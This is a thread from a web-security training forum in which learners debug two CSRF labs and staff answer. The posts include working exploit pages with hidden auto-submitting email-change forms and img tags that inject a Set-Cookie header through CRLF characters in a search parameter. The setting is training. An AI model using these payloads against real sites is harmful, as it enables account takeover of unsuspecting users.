Burp Suite User Forum

Create new post

Lab #5: CSRF where token is tied to non-session cookie & Lab #6: CSRF where token is duplicated in cookie issues

LeeSu | Last updated: Oct 11, 2022 05:28PM UTC

Hello, I have been working on the CSRF Labs and I'm having problem with the following labs: - Lab #5: CSRF where token is tied to non-session cookie - Lab #6: CSRF where token is duplicated in cookie issues For Lab #5, below is what I have tried. 1. Obtained the attacker's (carlos) CSRF key from the cookie header. 2. Obtained the attacker's (carlos) CSRF token from the input parameter. 3. Crafted an HTML page that does the followings: - Inject the attacker's CSRF key into the victim's (wiener) browser cookie using the HTTP Header Injection method. - Submit the email change request with the attacker's CSRF token as the "csrf" parameter value. And below is the HTML code I made: <html> <body> <iframe style="display:none;" name="csrf-iframe"></iframe> <form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned2@evil-user.net" /> <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" /> <input type="submit" name="Submit request" /> </form> <img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.getElementById('csrf-form').submit()"> </body> </html> I have also tried this: <html> <body> <iframe style="display:none;" name="csrf-iframe"></iframe> <form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned2@evil-user.net" /> <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" /> <input type="submit" name="Submit request" /> </form> <img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.forms[0].submit()"> </body> </html> And upon delivering both exploits using the exploit server, I don't get any success message for the lab and it remains unsolved. The victim's email does get changed when I submit the request with the attacker's CSRF key and token using Burp Repeater. I have followed the YouTube instruction but it still didn't get solved. When I view the exploit it says "Invalid CSRF Token". I don't understand how it can be as I have checked that I am using a fresh CSRF token and key from the attacker (carlos). For Lab #6, below is what I have tried. <html> <body> <iframe style="display:none;" name="csrf-iframe"></iframe> <form method="POST" action="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned1@evil-user.net" /> <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" /> </form> <img src="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" onerror="document.getElementById('csrf-form').submit()"> </body> </html> This also doesn't work using the exploit server, but it works when using Burp Repeater. I also have checked that the csrf token gets successfully injected into the cookie header with this input "TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" on the search function using Burp Repeater. Can you spot what is issue on my exploits? Thank you!

Michelle, PortSwigger Agent | Last updated: Oct 12, 2022 09:18AM UTC

Thanks for your message. There has been a recent change to the exploit server, so the $cookie-injection-url needs to include SameSite=None for these two labs, for example: https://<your-lab-id>/?search=test%0d%0aSet-Cookie:%20csrf=fake;%20SameSite=None We'll be updating the solutions soon.

LeeSu | Last updated: Oct 17, 2022 05:54PM UTC

Thank you for the reply, I was able to solve the labs following your instruction. Much appreciated.

BirD | Last updated: Mar 18, 2024 09:18AM UTC

I followed the steps in the video closely, but the email address was still not modified successfully ("Invalid CSRF token"). But submitting the same POC got "Congratulations, you solved the lab!". For Lab #6, below is what I have tried. <html> <body> <form method="POST" action="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned2@evil-user.net" /> <input type="hidden" name="csrf" value="pIoHy5hQ3urDP85gNtiopg0nFd52a3uf" /> <input type="submit" name="Submit request" /> </form> <img src="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=A9PU4tHQsloOMnhGwNd6Kw3Eg62DsNEH%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html>

Michelle, PortSwigger Agent | Last updated: Mar 18, 2024 01:29PM UTC

Hi When testing this on yourself, did you have the csrf token in the form set to your CSRF token and the csrfkey in the img src link set to fake? When you then deliver this to the victim, did you set both values to fake?

Mario | Last updated: Jun 13, 2024 09:35PM UTC

Hello, I have encountered an issue with the CSRF lab where the token is tied to a non-session cookie. I followed all the steps, but I am unsure if the problem lies with the browser (Burp's Chromium). I have two users, Wiener and Carlos. From Wiener, I obtain the two CSRF tokens. I then place them in the exploit server: <form method="POST" action="https://0abc0008040bb9448762670c0028001f.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="unmail777@mail.com"> <input type="hidden" name="csrf" value="ktw3B3EXEwad9rgv4TlvZrQZ9gONdepf"> </form> <img src="https://0abc0008040bb9448762670c0028001f.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=fGryYqHpou8b36uI8SkXKqCDCuQIxXGb%3b%20SameSite=None" onerror="document.forms[0].submit()"> After setting this up, I click on "store", copy the exploit link, and paste it into the browser where I have the user Carlos (my victim) logged in. Sometimes I open a new tab, and sometimes I stay in the same tab where I intend to change the email. When I submit the request, I get an invalid CSRF token error. I intercepted the request to see what was happening. The search is successful and sets the token, but when the POST request to change the email is made, the CSRFKey is still associated with Carlos' session instead of Wiener's. Is this issue related to the browser?

Hannah, PortSwigger Agent | Last updated: Jun 17, 2024 10:39AM UTC

I've tested this lab and can confirm that it is working as expected. Have you tried encoding any special characters to see if that makes a difference? For example, for your email value, use something like "asdf&#64;asdf&#46;asdf". Please also ensure that the email address you use in your exploit is unique and has not already been used in the lab. Additionally, you may want to verify that your CSRF token is up-to-date, so you could try refreshing your original session and verifying that the CSRF token is still the same.

david | Last updated: Jul 02, 2024 08:26AM UTC

BirD exploit is working but i cant understand why(when viewed exploit it shows"invalid token" but when delivered to victim the lab is solved I followed the steps in the video closely, but the email address was still not modified successfully ("Invalid CSRF token"). But submitting the same POC got "Congratulations, you solved the lab!". For Lab #6, below is what I have tried. <html> <body> <form method="POST" action="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="pwned2@evil-user.net" /> <input type="hidden" name="csrf" value="pIoHy5hQ3urDP85gNtiopg0nFd52a3uf" /> <input type="submit" name="Submit request" /> </form> <img src="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=A9PU4tHQsloOMnhGwNd6Kw3Eg62DsNEH%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html>

Carson | Last updated: Jul 10, 2024 09:16PM UTC

The issue from Lab 5 still exists, Ive followed many guides and it always gives Invalid CSRF token no matter how new it is, unused, have SameSite=None, encoded various symbols. I think internally lab might be broken.

Carson | Last updated: Jul 10, 2024 09:17PM UTC

Works when I try in browser then when I enter new CSRF token to send to victim it says Invalid CSRF. Accepts it from own browser each time.

Carson | Last updated: Jul 10, 2024 09:20PM UTC

Issue fixed after trying again with new CSRF token/cookie from Carlos, I did try this step prior but it didn't work, I do think lab can be a bit hard to work with.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.